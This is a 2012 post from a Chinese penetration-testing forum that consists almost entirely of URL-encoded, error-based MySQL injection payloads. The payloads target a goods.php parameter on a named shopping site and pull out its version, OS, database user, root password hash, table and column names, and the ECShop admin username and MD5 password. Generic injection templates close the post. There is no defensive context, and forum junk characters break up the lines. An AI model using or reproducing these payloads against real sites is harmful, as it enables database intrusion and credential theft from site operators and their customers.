中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]
作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号
+ ]" ^( j7 ~) Y  N7 W# c6 Thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" ?" _) r+ f6 f" }! k# g! ^0 ^
+ J0 P$ M: t! A+ N
判断系统
7 |$ }9 u% o- w% o$ h6 Y
: p& i; l5 Y; F* G1 \/ h7 phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- U' }) R, ~% L( o1 b) j% R
2 m1 @& U/ n! a& s$ [3 X& S

- x1 r+ {; V) l- i% Z; R$ U% m6 h- B/ [+ a: u
当前 user(); n7 G  k+ k0 ]+ U7 J& R* W' H
4 h/ C& s2 F2 `( C* `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* K; F9 F. S% ~& l& L- E$ l/ H6 U$ v! }7 L- Z  B

% ~( e+ k1 G6 u4 q1 i# x8 t
2 U! E: ]/ _4 W. r当前 database()7 W1 [/ U( @: y, @4 @4 S1 o& ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( P8 M1 K* x- F. e" O5 p2 g

7 f6 I) R5 {, U% P* e! P7 j. ]" U; O* P. I6 D( X

  |* Q- p0 c- L- r# c+ p
, ~$ q9 w8 T/ R, I5 ]root hash
, U& w! m8 ~. G9 K- _
: J( w8 o2 o6 K9 Dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. D7 s* _9 G  p6 w; N1 T: a5 |' n7 l0 |' W! Z2 I) j: l4 s

0 q' H% e; j4 z8 y- R7 o( o0 T/ O
) \9 v( Z3 b$ C* Z) D当前 数据库表名
( m5 q" ^9 _" ^( I" x" o) Z8 w& g) g" c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% |1 L. B$ F; L* j) C& c9 _
+ ~# f" E& c& Z; V8 A3 ^
- y. W, h5 H9 m9 o8 \

. ]+ N# |3 y: C0 |* I5 G& q当前 数据库 user_name 字段) Q: u* O! ~: W1 @8 t9 A$ [

6 a' i1 K5 I. g2 ~# k6 dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 y: |* O2 x+ g$ q% x
' W% |7 R+ i3 @' |3 C* c
当前 数据库 字段 password9 p7 q7 Q% A1 `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* j. L& }8 q/ p  A. J; F3 ~* p
. m! I% @! M" y0 Q; [- M: c! q/ H( A0 H, c: v1 K  ?, X1 T( `

6 j  {6 @" ^4 y4 l+ o获得 admin passwd(md5)
5 x6 `2 o0 v% B  t9 e; R
: v( K: c$ ?; [# Q# T% o4 U
) u7 l- W' P5 y; D+ ^1 E' ?http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. ?2 v9 Z4 q/ [2 N& c! S
1 b3 E$ |) }2 |$ ^7 S6 R. _5 C- t
报错注射
( i+ Y% k9 o' H, W' PSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)6 |1 m: R' T6 o+ Q

0 m0 v3 g# y- s+ ~5 H) H# [SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)4 C6 P  o# v& e  _
1 x0 `: C+ D. }- A; Q4 B
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2